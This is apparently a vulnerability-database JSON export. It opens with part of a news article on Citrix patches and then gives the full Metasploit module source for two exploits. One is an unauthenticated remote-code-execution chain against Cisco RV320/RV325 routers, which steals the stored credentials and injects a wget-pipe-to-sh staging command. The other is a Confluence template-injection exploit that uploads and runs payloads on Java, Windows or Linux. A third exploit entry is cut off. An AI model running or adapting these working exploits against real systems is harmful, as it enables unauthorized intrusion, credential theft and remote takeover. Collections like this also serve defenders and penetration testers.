flaw](<https://thehackernews.com/2020/01/citrix-adc-patch-update.html>) (tagged as [CVE-2019-19781](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>)) that allowed bad actors to perform [arbitrary code execution](<https://support.citrix.com/article/CTX267027>) even without proper authentication. \n \nIt also said there's no evidence the newly disclosed flaws are exploited in the wild and that barriers to exploitation of these flaws are high. \n \n\"Of the 11 vulnerabilities, there are six possible attacks routes; five of those have barriers to exploitation,\" Citrix's CISO Fermin Serna said. \"Two of the remaining three possible attacks additionally require some form of existing access. That effectively means an external malicious actor would first need to gain unauthorized access to a vulnerable device to be able to conduct an attack.\" \n \nAlthough Citrix has refrained from publishing technical details of the vulnerabilities citing malicious actors' efforts to leverage the patches and the information to reverse engineer exploits, attacks on the management interface of the products could result in system compromise by an unauthenticated user, or through Cross-Site Scripting (XSS) on the management interface. \n \nAn adversary could also create a download link for a vulnerable device, which could result in the compromise of a local computer upon execution by an unauthenticated user on the management network. \n \nA second class of attacks concerns virtual IPs (VIPs), permitting an attacker to mount DoS against the Gateway or remotely scan the ports of the internal network. \n \n\"Attackers can only discern whether a TLS connection is possible with the port and cannot communicate further with the end devices,\" Citrix noted in its [advisory](<https://support.citrix.com/article/CTX276688>). \n \nIn addition, a separate vulnerability in Citrix Gateway Plug-in for Linux (CVE-2020-8199) would grant a local logged-on user of a Linux system to elevate their privileges to an administrator account on that system. \n \nAccording to a [Positive Technologies](<https://www.ptsecurity.com/ww-en/about/news/citrix-vulnerability-allows-criminals-to-hack-networks-of-80000-companies/>) report last December, the traffic management and secure remote access applications are used by over 80,000 organizations across the world. \n \nIt's recommended that download and apply the latest builds for Citrix ADC, Citrix Gateway, and Citrix SD-WAN WANOP appliances as soon as possible to mitigate risk and defend against potential attacks designed to exploit these flaws.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-08T07:43:00", "type": "thn", "title": "Citrix Issues Critical Patches for 11 New Flaws Affecting Multiple Products", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781", "CVE-2020-8199"], "modified": "2020-07-08T07:43:59", "id": "THN:DABC62CDC9B66962217D9A8ABA9DF060", "href": "https://thehackernews.com/2020/07/citrix-software-security-update.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-08-16T08:11:44", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-04-03T00:00:00", "type": "exploitdb", "title": "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-1652", "2019-1653", "CVE-2019-1652", "CVE-2019-1653"], "modified": "2019-04-03T00:00:00", "id": "EDB-ID:46655", "href": "https://www.exploit-db.com/exploits/46655", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::HttpServer::HTML\r\n include Msf::Exploit::CmdStager\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Cisco RV320 and RV325 Unauthenticated Remote Code Execution\",\r\n 'Description' => %q{\r\n This exploit module combines an information disclosure (CVE-2019-1653)\r\n and a command injection vulnerability (CVE-2019-1652) together to gain\r\n unauthenticated remote code execution on Cisco RV320 and RV325 small business\r\n routers. Can be exploited via the WAN interface of the router. Either via HTTPS\r\n on port 443 or HTTP on port 8007 on some older firmware versions.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' => [\r\n 'RedTeam Pentesting GmbH', # Discovery, Metasploit\r\n 'Philip Huppert', # Discovery\r\n 'Benjamin Grap' # Metasploit\r\n ],\r\n 'References' => [\r\n [ 'CVE','2019-1653' ],\r\n [ 'CVE','2019-1652' ],\r\n [ 'EDB','46243' ],\r\n [ 'BID','106728' ],\r\n [ 'BID','106732' ],\r\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-002/-cisco-rv320-unauthenticated-configuration-export' ],\r\n [ 'URL', 'https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection' ]\r\n ],\r\n 'Platform' => 'linux',\r\n 'Targets' =>\r\n [\r\n [ 'LINUX MIPS64',\r\n {\r\n 'Platform' => 'linux',\r\n 'Arch' => ARCH_MIPS64\r\n }\r\n ]\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\"\r\n },\r\n 'CmdStagerFlavor' => [ 'bourne' ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => \"Sep 9 2018\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options([\r\n Opt::RPORT(8007), # port of Cisco webinterface\r\n OptString.new('URIPATH', [true, 'The path for the stager. Keep set to default! (We are limited to 50 chars for the initial command.)', '/']),\r\n OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 15]),\r\n OptBool.new('USE_SSL', [false, 'Negotiate SSL/TLS for outgoing connections', false]) # Don't use 'SSL' option to prevent HttpServer from picking this up.\r\n ])\r\n deregister_options('SSL') # prevent SSL in HttpServer and resulting payload requests since the injected wget command will not work with '--no-check-certificate' option.\r\n deregister_options('SSLCert') # not required since stager only uses HTTP.\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n # use generated payload, we don't have to do anything here\r\n end\r\n\r\n def autofilter\r\n true\r\n end\r\n\r\n def on_request_uri(cli, req)\r\n print_status(\"#{peer} - Payload request received: #{req.uri}\")\r\n @cmdstager = generate_cmdstager().join(';')\r\n send_response(cli, \"#{@cmdstager}\")\r\n end\r\n\r\n def primer\r\n payload_url = get_uri\r\n print_status(\"Downloading configuration from #{peer}\")\r\n if(datastore['USE_SSL'])\r\n print_status(\"Using SSL connection to router.\")\r\n end\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(\"cgi-bin\",\"config.exp\"),\r\n 'SSL' => datastore['USE_SSL']\r\n })\r\n unless res\r\n vprint_error('Connection failed.')\r\n return nil\r\n end\r\n\r\n unless res.code == 200\r\n vprint_error('Could not download config. Aborting.')\r\n return nil\r\n end\r\n\r\n print_status(\"Successfully downloaded config\")\r\n username = res.body.match(/^USERNAME=([a-zA-Z]+)/)[1]\r\n pass = res.body.match(/^PASSWD=(\\h+)/)[1]\r\n authkey = \"1964300002\"\r\n print_status(\"Got MD5-Hash: #{pass}\")\r\n print_status(\"Loging in as user #{username} using password hash.\")\r\n print_status(\"Using default auth_key #{authkey}\")\r\n res2 = send_request_cgi({\r\n 'uri' => normalize_uri(\"cgi-bin\",\"userLogin.cgi\"),\r\n 'SSL' => datastore['USE_SSL'],\r\n 'method' => 'POST',\r\n 'data' => \"login=true&portalname=CommonPortal&password_expired=0&auth_key=#{authkey}&auth_server_pw=Y2lzY28%3D&submitStatus=0&pdStrength=1&username=#{username}&password=#{pass}&LanguageList=Deutsch&current_password=&new_password=&re_new_password=\"\r\n })\r\n\r\n unless res\r\n vprint_error('Connection failed during login. Aborting.')\r\n return nil\r\n end\r\n\r\n unless res.code == 200\r\n vprint_error('Login failed with downloaded credentials. Aborting.')\r\n return nil\r\n end\r\n\r\n #Extract authentication cookies\r\n cookies = res2.get_cookies()\r\n print_status(\"Successfully logged in as user #{username}.\")\r\n print_status(\"Got cookies: #{cookies}\")\r\n print_status(\"Sending payload. Staging via #{payload_url}.\")\r\n #Build staging command\r\n command_string = CGI::escape(\"'$(wget -q -O- #{payload_url}|sh)'\")\r\n if(command_string.length <= 63)\r\n print_status(\"Staging command length looks good. Sending exploit!\")\r\n else\r\n vprint_error(\"Warning: Staging command length probably too long. Trying anyway...\")\r\n end\r\n\r\n res3 = send_request_cgi({\r\n 'uri' => normalize_uri(\"certificate_handle2.htm\"),\r\n 'SSL' => datastore['USE_SSL'],\r\n 'method' => 'POST',\r\n 'cookie' => cookies,\r\n 'vars_get' => {\r\n 'type' => '4',\r\n },\r\n 'vars_post' => {\r\n 'page' => 'self_generator.htm',\r\n 'totalRules' => '1',\r\n 'OpenVPNRules' => '30',\r\n 'submitStatus' => '1',\r\n 'log_ch' => '1',\r\n 'type' => '4',\r\n 'Country' => 'A',\r\n 'state' => 'A',\r\n 'locality' => 'A',\r\n 'organization' => 'A',\r\n 'organization_unit' => 'A',\r\n 'email' => 'any@example.com',\r\n 'KeySize' => '512',\r\n 'KeyLength' => '1024',\r\n 'valid_days' => '30',\r\n 'SelectSubject_c' => '1',\r\n 'SelectSubject_s' => '1'\r\n },\r\n 'data' => \"common_name=#{command_string}\"\r\n })\r\n unless res3\r\n vprint_error('Connection failed while sending command. Aborting.')\r\n return nil\r\n end\r\n\r\n unless res3.code == 200\r\n vprint_error('Sending command not successful.')\r\n return nil\r\n end\r\n print_status(\"Sending payload timed out. Waiting for stager to connect...\")\r\n end\r\n\r\n def check\r\n #Check if device is vulnerable by downloading the config\r\n res = send_request_cgi({'uri'=>normalize_uri(\"cgi-bin\",\"config.exp\")})\r\n\r\n unless res\r\n vprint_error('Connection failed.')\r\n return CheckCode::Unknown\r\n end\r\n\r\n unless res.code == 200\r\n return CheckCode::Safe\r\n end\r\n\r\n unless res.body =~ /PASSWD/\r\n return CheckCode::Detected\r\n end\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def exploit\r\n # Main function.\r\n # Setting delay for the Stager.\r\n Timeout.timeout(datastore['HTTPDELAY']) {super}\r\n rescue Timeout::Error\r\n print_status(\"Waiting for stager connection timed out. Try increasing the delay.\")\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46655", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:10:35", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-19T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - Velocity Template Injection (Metasploit)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-3396", "CVE-2019-3396"], "modified": "2019-04-19T00:00:00", "id": "EDB-ID:46731", "href": "https://www.exploit-db.com/exploits/46731", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::Remote::FtpServer\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"Atlassian Confluence Widget Connector Macro Velocity Template Injection\",\r\n 'Description' => %q{\r\n Widget Connector Macro is part of Atlassian Confluence Server and Data Center that\r\n allows embed online videos, slideshows, photostreams and more directly into page.\r\n A _template parameter can be used to inject remote Java code into a Velocity template,\r\n and gain code execution. Authentication is unrequired to exploit this vulnerability.\r\n By default, Java payload will be used because it is cross-platform, but you can also\r\n specify which native payload you want (Linux or Windows).\r\n\r\n Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version\r\n 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected.\r\n\r\n This vulnerability was originally discovered by Daniil Dmitriev\r\n https://twitter.com/ddv_ua.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Daniil Dmitriev', # Discovering vulnerability\r\n 'Dmitry (rrock) Shchannikov' # Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n [ 'CVE', '2019-3396' ],\r\n [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],\r\n [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-\u3010CVE-2019-3396\u3011-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],\r\n [ 'URL', 'https://paper.seebug.org/886/']\r\n ],\r\n 'Targets' =>\r\n [\r\n [ 'Java', { 'Platform' => 'java', 'Arch' => ARCH_JAVA }],\r\n [ 'Windows', { 'Platform' => 'win', 'Arch' => ARCH_X86 }],\r\n [ 'Linux', { 'Platform' => 'linux', 'Arch' => ARCH_X86 }]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'RPORT' => 8090,\r\n 'SRVPORT' => 8021,\r\n },\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Mar 25 2019',\r\n 'DefaultTarget' => 0,\r\n 'Stance' => Msf::Exploit::Stance::Aggressive\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),\r\n OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',\r\n 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])\r\n ])\r\n end\r\n\r\n # Handles ftp RETP command.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] RETR argument.\r\n # @return [void]\r\n def on_client_command_retr(c, arg)\r\n vprint_status(\"FTP download request for #{arg}\")\r\n conn = establish_data_connection(c)\r\n if(not conn)\r\n c.put(\"425 Can't build data connection\\r\\n\")\r\n return\r\n end\r\n\r\n c.put(\"150 Opening BINARY mode data connection for #{arg}\\r\\n\")\r\n case arg\r\n when /check\\.vm$/\r\n conn.put(wrap(get_check_vm))\r\n when /javaprop\\.vm$/\r\n conn.put(wrap(get_javaprop_vm))\r\n when /upload\\.vm$/\r\n conn.put(wrap(get_upload_vm))\r\n when /exec\\.vm$/\r\n conn.put(wrap(get_exec_vm))\r\n else\r\n conn.put(wrap(get_dummy_vm))\r\n end\r\n c.put(\"226 Transfer complete.\\r\\n\")\r\n conn.close\r\n end\r\n\r\n # Handles ftp PASS command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] PASS argument.\r\n # @return [void]\r\n def on_client_command_pass(c, arg)\r\n @state[c][:pass] = arg\r\n vprint_status(\"#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}\")\r\n c.put \"230 Login OK\\r\\n\"\r\n end\r\n\r\n # Handles ftp EPSV command to suppress output.\r\n #\r\n # @param c [Socket] Control connection socket.\r\n # @param arg [String] EPSV argument.\r\n # @return [void]\r\n def on_client_command_epsv(c, arg)\r\n vprint_status(\"#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'\")\r\n c.put(\"500 'EPSV #{arg}': command not understood.\\r\\n\")\r\n end\r\n\r\n # Returns a upload template.\r\n #\r\n # @return [String]\r\n def get_upload_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.io.FileOutputStream').getConstructor($i18n.getClass().forName('java.lang.String')).newInstance('#{@fname}').write($i18n.getClass().forName('sun.misc.BASE64Decoder').getConstructor(null).newInstance(null).decodeBuffer('#{@b64}'))\r\n EOF\r\n )\r\n end\r\n\r\n # Returns a command execution template.\r\n #\r\n # @return [String]\r\n def get_exec_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec('#{@command}').waitFor()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns checking template.\r\n #\r\n # @return [String]\r\n def get_check_vm\r\n (\r\n <<~EOF\r\n #{@check_text}\r\n EOF\r\n )\r\n end\r\n\r\n # Returns Java's getting property template.\r\n #\r\n # @return [String]\r\n def get_javaprop_vm\r\n (\r\n <<~EOF\r\n $i18n.getClass().forName('java.lang.System').getMethod('getProperty', $i18n.getClass().forName('java.lang.String')).invoke(null, '#{@prop}').toString()\r\n EOF\r\n )\r\n end\r\n\r\n # Returns dummy template.\r\n #\r\n # @return [String]\r\n def get_dummy_vm\r\n (\r\n <<~EOF\r\n EOF\r\n )\r\n end\r\n\r\n # Checks the vulnerability.\r\n #\r\n # @return [Array] Check code\r\n def check\r\n checkcode = Exploit::CheckCode::Safe\r\n begin\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n @check_text = Rex::Text.rand_text_alpha(5..10)\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}check.vm\")\r\n if res && res.body && res.body.include?(@check_text)\r\n checkcode = Exploit::CheckCode::Vulnerable\r\n end\r\n rescue Msf::Exploit::Failed => e\r\n vprint_error(e.message)\r\n checkcode = Exploit::CheckCode::Unknown\r\n end\r\n checkcode\r\n end\r\n\r\n # Injects Java code to the template.\r\n #\r\n # @param service_url [String] Address of template to injection.\r\n # @return [void]\r\n def inject_template(service_url, timeout=20)\r\n\r\n uri = normalize_uri(target_uri.path, 'rest', 'tinymce', '1', 'macro', 'preview')\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => uri,\r\n 'headers' => {\r\n 'Accept' => '*/*',\r\n 'Origin' => full_uri(vhost_uri: true)\r\n },\r\n 'ctype' => 'application/json; charset=UTF-8',\r\n 'data' => {\r\n 'contentId' => '1',\r\n 'macro' => {\r\n 'name' => 'widget',\r\n 'body' => '',\r\n 'params' => {\r\n 'url' => datastore['TRIGGERURL'],\r\n '_template' => service_url\r\n }\r\n\r\n }\r\n }.to_json\r\n }, timeout=timeout)\r\n\r\n unless res\r\n unless service_url.include?(\"exec.vm\")\r\n print_warning('Connection timed out in #inject_template')\r\n end\r\n return\r\n end\r\n\r\n if res.body.include? 'widget-error'\r\n print_error('Failed to inject and execute code:')\r\n else\r\n vprint_status(\"Server response:\")\r\n end\r\n\r\n vprint_line(res.body)\r\n\r\n res\r\n end\r\n\r\n # Returns a system property for Java.\r\n #\r\n # @param prop [String] Name of the property to retrieve.\r\n # @return [String]\r\n def get_java_property(prop)\r\n @prop = prop\r\n res = inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}javaprop.vm\")\r\n if res && res.body\r\n return clear_response(res.body)\r\n end\r\n ''\r\n end\r\n\r\n # Returns the target platform.\r\n #\r\n # @return [String]\r\n def get_target_platform\r\n return get_java_property('os.name')\r\n end\r\n\r\n # Checks if the target os/platform is compatible with the module target or not.\r\n #\r\n # @return [TrueClass] Compatible\r\n # @return [FalseClass] Not compatible\r\n def target_platform_compat?(target_platform)\r\n target.platform.names.each do |n|\r\n if n.downcase == 'java' || target_platform.downcase.include?(n.downcase)\r\n return true\r\n end\r\n end\r\n\r\n false\r\n end\r\n\r\n # Returns a temp path from the remote target.\r\n #\r\n # @return [String]\r\n def get_tmp_path\r\n return get_java_property('java.io.tmpdir')\r\n end\r\n\r\n # Returns the Java home path used by Confluence.\r\n #\r\n # @return [String]\r\n def get_java_home_path\r\n return get_java_property('java.home')\r\n end\r\n\r\n # Returns Java code that can be used to inject to the template in order to copy a file.\r\n #\r\n # @note The purpose of this method is to have a file that is not busy, so we can execute it.\r\n # It is meant to be used with #get_write_file_code.\r\n #\r\n # @param fname [String] The file to copy\r\n # @param new_fname [String] The new file\r\n # @return [void]\r\n def get_dup_file_code(fname, new_fname)\r\n if fname =~ /^\\/[[:print:]]+/\r\n @command = \"cp #{fname} #{new_fname}\"\r\n else\r\n @command = \"cmd.exe /C copy #{fname} #{new_fname}\"\r\n end\r\n\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n end\r\n\r\n # Returns the normalized file path for payload.\r\n #\r\n # @return [String]\r\n def normalize_payload_fname(tmp_path, fname)\r\n # A quick way to check platform insteaf of actually grabbing os.name in Java system properties.\r\n if /^\\/[[:print:]]+/ === tmp_path\r\n Rex::FileUtils.normalize_unix_path(tmp_path, fname)\r\n else\r\n Rex::FileUtils.normalize_win_path(tmp_path, fname)\r\n end\r\n end\r\n\r\n # Exploits the target in Java platform.\r\n #\r\n # @return [void]\r\n def exploit_as_java\r\n\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @fname = normalize_payload_fname(tmp_path, \"#{Rex::Text.rand_text_alpha(5)}.jar\")\r\n @b64 = Rex::Text.encode_base64(payload.encoded_jar)\r\n @command = ''\r\n\r\n java_home = get_java_home_path\r\n\r\n if java_home.blank?\r\n fail_with(Failure::Unknown, 'Unable to find java home path on the remote machine.')\r\n else\r\n vprint_status(\"Found Java home path: #{java_home}\")\r\n end\r\n\r\n register_files_for_cleanup(@fname)\r\n\r\n if /^\\/[[:print:]]+/ === @fname\r\n normalized_java_path = Rex::FileUtils.normalize_unix_path(java_home, '/bin/java')\r\n @command = %Q|#{normalized_java_path} -jar #{@fname}|\r\n else\r\n normalized_java_path = Rex::FileUtils.normalize_win_path(java_home, '\\\\bin\\\\java.exe')\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n @command = %Q|cmd.exe /C \"#{normalized_java_path}\" -jar #{@fname}|\r\n end\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to execute #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Windows platform.\r\n #\r\n # @return [void]\r\n def exploit_as_windows\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n new_fname = normalize_payload_fname(tmp_path,\"#{Rex::Text.rand_text_alpha(5)}.exe\")\r\n @fname.gsub!(/Program Files/, 'PROGRA~1')\r\n new_fname.gsub!(/Program Files/, 'PROGRA~1')\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n\r\n # Exploits the target in Linux platform.\r\n #\r\n # @return [void]\r\n def exploit_as_linux\r\n tmp_path = get_tmp_path\r\n\r\n if tmp_path.blank?\r\n fail_with(Failure::Unknown, 'Unable to get the temp path.')\r\n end\r\n\r\n @b64 = Rex::Text.encode_base64(generate_payload_exe(code: payload.encoded, arch: target.arch, platform: target.platform))\r\n @fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(5))\r\n new_fname = normalize_payload_fname(tmp_path, Rex::Text.rand_text_alpha(6))\r\n register_files_for_cleanup(@fname, new_fname)\r\n\r\n print_status(\"Attempting to upload #{@fname}\")\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}upload.vm\")\r\n\r\n @command = \"chmod +x #{@fname}\"\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\")\r\n\r\n print_status(\"Attempting to copy payload to #{new_fname}\")\r\n get_dup_file_code(@fname, new_fname)\r\n\r\n print_status(\"Attempting to execute #{new_fname}\")\r\n @command = new_fname\r\n inject_template(\"ftp://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}/#{Rex::Text.rand_text_alpha(5)}exec.vm\", timeout=5)\r\n end\r\n\r\n def exploit\r\n @wrap_marker = Rex::Text.rand_text_alpha(5..10)\r\n\r\n # Start the FTP service\r\n print_status(\"Starting the FTP server.\")\r\n start_service\r\n\r\n target_platform = get_target_platform\r\n if target_platform.nil?\r\n fail_with(Failure::Unreachable, 'Target did not respond to OS check. Confirm RHOSTS and RPORT, then run \"check\".')\r\n else\r\n print_status(\"Target being detected as: #{target_platform}\")\r\n end\r\n\r\n unless target_platform_compat?(target_platform)\r\n fail_with(Failure::BadConfig, 'Selected module target does not match the actual target.')\r\n end\r\n\r\n case target.name.downcase\r\n when /java$/\r\n exploit_as_java\r\n when /windows$/\r\n exploit_as_windows\r\n when /linux$/\r\n exploit_as_linux\r\n end\r\n end\r\n\r\n # Wraps request.\r\n #\r\n # @return [String]\r\n def wrap(string)\r\n \"#{@wrap_marker}\\n#{string}#{@wrap_marker}\\n\"\r\n end\r\n\r\n # Returns unwrapped response.\r\n #\r\n # @return [String]\r\n def clear_response(string)\r\n if match = string.match(/#{@wrap_marker}\\n(.*)\\n#{@wrap_marker}\\n/m)\r\n return match.captures[0]\r\n end\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/46731", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-16T06:05:37", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-22T00:00:00", "type": "exploitdb", "title": "Atlassian Confluence Widget Connector Macro - SSTI", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2019-3396", "CVE-2019-3396"], "modified": "2021-01-22T00:00:00", "id": "EDB-ID:49465", "href": "https://www.exploit-db.com/exploits/49465", "sourceData": "# Exploit Title: Atlassian Confluence Widget Connector Macro - SSTI \r\n# Date: 21-Jan-2021\r\n# Exploit Author: 46o60\r\n# Vendor Homepage: https://www.atlassian.com/software/confluence\r\n# Software Link: 